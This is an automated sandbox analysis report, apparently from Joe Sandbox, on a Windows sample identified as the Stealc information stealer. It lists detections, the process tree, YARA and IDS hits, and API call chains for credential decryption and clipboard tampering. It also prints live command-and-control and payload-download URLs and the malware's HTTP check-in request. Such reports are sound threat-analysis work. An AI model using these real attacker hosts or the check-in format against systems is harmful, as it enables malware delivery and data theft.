
Windows Analysis Report
GK059kPZ5B.exe

Overview

General Information

Sample name: GK059kPZ5B.exe
renamed because original name is a hash value
Original sample name: 9883fdabd29a18139bd1cadedf550f35.exe
Analysis ID: 1542871
MD5: 9883fdabd29a18139bd1cadedf550f35
SHA1: b05c71cb505793c12a728daeaf069b90ea289d6d
SHA256: 2d982e9ce07d6b2d0359f388c0cc0e2ad3fc3bed3b44236ef9d442abcaf44f30
Tags: exe, Stealc, user-abuse_ch

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Machine Learning detection for dropped file
Machine Learning detection for sample
Searches for specific processes (likely to inject)
AV process strings found (often used to terminate AV products)
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • GK059kPZ5B.exe (PID: 7092 cmdline: "C:\Users\user\Desktop\GK059kPZ5B.exe" MD5: 9883FDABD29A18139BD1CADEDF550F35)
    • A865.tmp.exe (PID: 3640 cmdline: "C:\Users\user\AppData\Local\Temp\A865.tmp.exe" MD5: 8107C38AF897D81AA4BFE8CE9CA8407C)
      • WerFault.exe (PID: 6572 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3640 -s 1324 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop applications of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs: (none)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://62.204.41.177/edd20096ecef326d.php", "Botnet": "default9_cap"}
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security |

Source | Rule | Description | Author | Strings
00000000.00000002.4555377117.0000000000869000.00000040.00000020.00020000.00000000.sdmp | Windows_Trojan_RedLineStealer_ed346e4c | unknown | unknown |
  • 0xea8:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000002.00000002.3069360956.0000000000849000.00000040.00000020.00020000.00000000.sdmp | Windows_Trojan_RedLineStealer_ed346e4c | unknown | unknown |
  • 0x11f0:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000002.00000002.3069391688.0000000000873000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_Smokeloader_3687686f | unknown | unknown |
  • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |

Source | Rule | Description | Author | Strings
2.2.A865.tmp.exe.400000.1.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
2.2.A865.tmp.exe.22d0e67.3.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
2.2.A865.tmp.exe.22d0e67.3.raw.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
2.3.A865.tmp.exe.2320000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
2.3.A865.tmp.exe.2320000.0.raw.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |

No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-26T19:08:41.936068+0200 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49707 | 62.204.41.177 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-26T19:08:32.658480+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49704 | 172.67.179.207 | 443 | TCP
2024-10-26T19:08:33.704551+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49705 | 176.113.115.37 | 80 | TCP

AV Detection

Source: 00000002.00000003.2224459772.0000000002320000.00000004.00001000.00020000.00000000.sdmp | Malware Configuration Extractor: StealC {"C2 url": "http://62.204.41.177/edd20096ecef326d.php", "Botnet": "default9_cap"}
Source: GK059kPZ5B.exe | ReversingLabs: Detection: 50%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\ScreenUpdateSync[1].exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exe | Joe Sandbox ML: detected
Source: GK059kPZ5B.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exe | Code function: 2_2_0040C820 memset,lstrlenA,CryptStringToBinaryA,memcpy,lstrcatA,lstrcatA,lstrcatA,2_2_0040C820
Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exe | Code function: 2_2_00407240 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,2_2_00407240
Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exe | Code function: 2_2_00409AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,2_2_00409AC0
Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exe | Code function: 2_2_00418EA0 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,2_2_00418EA0
Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exe | Code function: 2_2_00409B60 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,2_2_00409B60
Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exe | Code function: 2_2_022DCA87 memset,lstrlen,CryptStringToBinaryA,memcpy,lstrcat,lstrcat,lstrcat,2_2_022DCA87
Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exe | Code function: 2_2_022D74A7 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,2_2_022D74A7
Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exe | Code function: 2_2_022D9D27 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,2_2_022D9D27
Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exe | Code function: 2_2_022E9107 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,2_2_022E9107
Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exe | Code function: 2_2_022D9DC7 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,2_2_022D9DC7

Compliance

Source: C:\Users\user\Desktop\GK059kPZ5B.exe | Unpacked PE file: 0.2.GK059kPZ5B.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exe | Unpacked PE file: 2.2.A865.tmp.exe.400000.1.unpack
Source: GK059kPZ5B.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\GK059kPZ5B.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: unknown | HTTPS traffic detected: 172.67.179.207:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: C:\Users\user\Desktop\GK059kPZ5B.exe | Code function: 0_2_00438A12 FindFirstFileExW,0_2_00438A12
Source: C:\Users\user\Desktop\GK059kPZ5B.exe | Code function: 0_2_00A88C79 FindFirstFileExW,0_2_00A88C79
Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exe | Code function: 2_2_0040E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,2_2_0040E430
Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exe | Code function: 2_2_004138B0 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,2_2_004138B0
Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exe | Code function: 2_2_00414570 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,2_2_00414570
Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exe | Code function: 2_2_00414910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_00414910
Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exe | Code function: 2_2_0040ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,2_2_0040ED20
Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exe | Code function: 2_2_0040BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,2_2_0040BE70
Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exe | Code function: 2_2_0040DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_0040DE10
Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exe | Code function: 2_2_004016D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_004016D0
Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exe | Code function: 2_2_0040DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,2_2_0040DA80
Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exe | Code function: 2_2_00413EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,2_2_00413EA0
Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exe | Code function: 2_2_0040F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_0040F6B0
Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exe | Code function: 2_2_022DE697 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,2_2_022DE697
Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exe | Code function: 2_2_022E3B17 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,2_2_022E3B17
Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exe | Code function: 2_2_022E4B77 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_022E4B77
Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exe | Code function: 2_2_022DEF87 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,2_2_022DEF87
Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exe | Code function: 2_2_022E47D7 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,2_2_022E47D7
Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exe | Code function: 2_2_022DE077 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_022DE077
Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exe | Code function: 2_2_022DDCE7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,2_2_022DDCE7
Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exe | Code function: 2_2_022DF8F1 FindFirstFileA,2_2_022DF8F1
Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exe | Code function: 2_2_022DC0D7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,2_2_022DC0D7
Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exe | Code function: 2_2_022D1937 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_022D1937
Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exe | Code function: 2_2_022E4107 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,2_2_022E4107
Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exe | Code function: 2_2_022DF917 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_022DF917

Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49707 -> 62.204.41.177:80
Source: Malware configuration extractor | URLs: http://62.204.41.177/edd20096ecef326d.php
Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK Date: Sat, 26 Oct 2024 17:08:33 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Sat, 26 Oct 2024 17:00:01 GMT ETag: "62400-625642a987083" Accept-Ranges: bytes Content-Length: 402432 Content-Type: application/x-msdos-program | Data Raw: [MZ executable payload, 402432 bytes]
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 Host: 62.204.41.177 Connection: Keep-Alive Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DAFHIDGIJKJKECBGDBGH Host: 62.204.41.177 Content-Length: 219 Connection: Keep-Alive Cache-Control: no-cache | Data Ascii: ------DAFHIDGIJKJKECBGDBGH Content-Disposition: form-data; name="hwid" B683BB041FDB2496618675 ------DAFHIDGIJKJKECBGDBGH Content-Disposition: form-data; name="build" default9_cap ------DAFHIDGIJKJKECBGDBGH--
Source: Joe Sandbox View | IP Address: 176.113.115.37
Source: Joe Sandbox View | IP Address: 62.204.41.177
Source: Joe Sandbox View | ASN Name: TNNET-ASTNNetOyMainnetworkFI
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49705 -> 176.113.115.37:80
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49704 -> 172.67.179.207:443
Source: unknown | TCP traffic detected without corresponding DNS query: 176.113.115.37
Source: C:\Users\user\Desktop\GK059kPZ5B.exe | Code function: 0_2_00402A14 InternetOpenW,InternetOpenUrlW,GetTempPathW,GetTempFileNameW,CreateFileW,InternetReadFile,WriteFile,CloseHandle,CloseHandle,ShellExecuteExW,WaitForSingleObject,CloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00402A14
Source: global traffic | HTTP traffic detected: GET /track_prt.php?sub=0&cc=DE HTTP/1.1 User-Agent: ShareScreen Host: post-to-me.com
Source: global traffic | HTTP traffic detected: GET /ScreenUpdateSync.exe HTTP/1.1 User-Agent: ShareScreen Host: 176.113.115.37
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 Host: 62.204.41.177 Connection: Keep-Alive Cache-Control: no-cache
Source: global traffic | DNS traffic detected: DNS query: post-to-me.com
Source: unknown | HTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DAFHIDGIJKJKECBGDBGH Host: 62.204.41.177 Content-Length: 219 Connection: Keep-Alive Cache-Control: no-cache | Data Ascii: ------DAFHIDGIJKJKECBGDBGH Content-Disposition: form-data; name="hwid" B683BB041FDB2496618675 ------DAFHIDGIJKJKECBGDBGH Content-Disposition: form-data; name="build" default9_cap ------DAFHIDGIJKJKECBGDBGH--
Source: GK059kPZ5B.exe, GK059kPZ5B.exe, 00000000.00000003.4442572205.000000000090F000.00000004.00000020.00020000.00000000.sdmp, GK059kPZ5B.exe, 00000000.00000002.4555505002.0000000000911000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://176.113.115.37/ScreenUpdateSync.exe
Source: GK059kPZ5B.exe, 00000000.00000003.4442572205.000000000090F000.00000004.00000020.00020000.00000000.sdmp, GK059kPZ5B.exe, 00000000.00000002.4555505002.0000000000911000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://176.113.115.37/ScreenUpdateSync.exe)a
Source: GK059kPZ5B.exe, 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://176.113.115.37/ScreenUpdateSync.exe48rt8k8rt4rwe5rbSOFTWARE
Source: GK059kPZ5B.exe, 00000000.00000003.4442572205.000000000090F000.00000004.00000020.00020000.00000000.sdmp, GK059kPZ5B.exe, 00000000.00000002.4555505002.0000000000911000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://176.113.115.37/ScreenUpdateSync.exeDT
Source: A865.tmp.exe, 00000002.00000002.3069391688.0000000000873000.00000004.00000020.00020000.00000000.sdmp, A865.tmp.exe, 00000002.00000002.3069309026.000000000083E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://62.204.41.177
Source: A865.tmp.exe, 00000002.00000002.3069391688.0000000000873000.00000004.00000020.00020000.00000000.sdmp, A865.tmp.exe, 00000002.00000002.3069391688.00000000008AC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://62.204.41.177/
Source: A865.tmp.exe, 00000002.00000002.3069391688.00000000008AC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://62.204.41.177/6
Source: A865.tmp.exe, 00000002.00000002.3069391688.00000000008C6000.00000004.00000020.00020000.00000000.sdmp, A865.tmp.exe, 00000002.00000002.3069391688.00000000008AC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://62.204.41.177/edd20096ecef326d.php
Source: A865.tmp.exe, 00000002.00000002.3069391688.00000000008AC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://62.204.41.177/edd20096ecef326d.php$
Source: A865.tmp.exe, 00000002.00000002.3069391688.00000000008AC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://62.204.41.177/edd20096ecef326d.phpN
Source: A865.tmp.exe, 00000002.00000002.3069391688.00000000008AC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://62.204.41.177/edd20096ecef326d.phpZ
Source: A865.tmp.exe, 00000002.00000002.3069391688.00000000008AC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://62.204.41.177/edd20096ecef326d.phpf
Source: A865.tmp.exe, 00000002.00000002.3069309026.000000000083E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://62.204.41.177i
Source: Amcache.hve.5.dr | String found in binary or memory: http://upx.sf.net
Source: GK059kPZ5B.exe, 00000000.00000002.4555417767.00000000008DC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://post-to-me.com/
Source: GK059kPZ5B.exe, 00000000.00000002.4555417767.00000000008DC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://post-to-me.com/=
Source: GK059kPZ5B.exe | String found in binary or memory: https://post-to-me.com/track_prt.php?sub=
Source: GK059kPZ5B.exe, 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://post-to-me.com/track_prt.php?sub=&cc=DE
Source: GK059kPZ5B.exe, 00000000.00000002.4555417767.00000000008DC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://post-to-me.com/track_prt.php?sub=0&cc=DE
Source: GK059kPZ5B.exe, 00000000.00000002.4555417767.00000000008DC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://post-to-me.com/track_prt.php?sub=0&cc=DEe
Source: unknown | Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown | HTTPS traffic detected: 172.67.179.207:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: C:\Users\user\Desktop\GK059kPZ5B.exe | Code function: 0_2_004016E3 __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,OpenClipboard,GetClipboardData,GlobalLock,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,0_2_004016E3
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe | Code function: 0_2_00A51947 __EH_prolog3_GS,Sleep,OpenClipboard,GetClipboardData,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep, 0_2_00A51947

                  System Summary

                  Source: 00000000.00000002.4555377117.0000000000869000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 00000002.00000002.3069360956.0000000000849000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe | Code function: 0_2_00A5237D NtdllDefWindowProc_W,GetClientRect,GetDC,CreateSolidBrush,CreatePen,Rectangle,GetDeviceCaps,MulDiv,CreateFontW,SetBkMode,_wcslen,_wcslen,_wcslen,_wcslen,ReleaseDC, 0_2_00A5237D
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe | Code function: 0_2_00A52621 NtdllDefWindowProc_W,PostQuitMessage, 0_2_00A52621
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe | Code function: 0_2_00428042 0_2_00428042
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe | Code function: 0_2_004071D0 0_2_004071D0
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe | Code function: 0_2_004373F9 0_2_004373F9
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe | Code function: 0_2_004274A4 0_2_004274A4
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe | Code function: 0_2_0042D50E 0_2_0042D50E
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe | Code function: 0_2_00428580 0_2_00428580
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe | Code function: 0_2_004166CF 0_2_004166CF
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe | Code function: 0_2_0043D698 0_2_0043D698
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe | Code function: 0_2_00413745 0_2_00413745
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe | Code function: 0_2_00427816 0_2_00427816
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe | Code function: 0_2_0040E999 0_2_0040E999
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe | Code function: 0_2_00427AC0 0_2_00427AC0
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe | Code function: 0_2_00418ACF 0_2_00418ACF
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe | Code function: 0_2_0042EB00 0_2_0042EB00
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe | Code function: 0_2_00436CDF 0_2_00436CDF
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe | Code function: 0_2_00427D87 0_2_00427D87
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe | Code function: 0_2_00413F2B 0_2_00413F2B
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe | Code function: 0_2_00A64192 0_2_00A64192
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe | Code function: 0_2_00A7ED67 0_2_00A7ED67
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe | Code function: 0_2_00A782A9 0_2_00A782A9
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe | Code function: 0_2_00A787E7 0_2_00A787E7
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe | Code function: 0_2_00A7770B 0_2_00A7770B
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe | Code function: 0_2_00A7D775 0_2_00A7D775
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe | Code function: 0_2_00A639AC 0_2_00A639AC
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe | Code function: 0_2_00A66936 0_2_00A66936
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe | Code function: 0_2_00A77A7D 0_2_00A77A7D
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe | Code function: 0_2_00A5EC00 0_2_00A5EC00
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe | Code function: 0_2_00A77D27 0_2_00A77D27
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe | Code function: 0_2_00A68D36 0_2_00A68D36
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe | Code function: 0_2_00A77FEE 0_2_00A77FEE
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe | Code function: 0_2_00A86F46 0_2_00A86F46
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe | Code function: String function: 00410740 appears 53 times
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe | Code function: String function: 00A609A7 appears 53 times
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe | Code function: String function: 0040F928 appears 36 times
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe | Code function: String function: 0040FDD7 appears 125 times
                  Source: C:\Users\user\Desktop\GK059kPZ5B.exe | Code function: String function: 00A6003E appears 121 times
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exe | Code function: String function: 004045C0 appears 317 times
                  Source: C:\Users\user\AppData\Local\Temp\A865.tmp.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3640 -s 1324
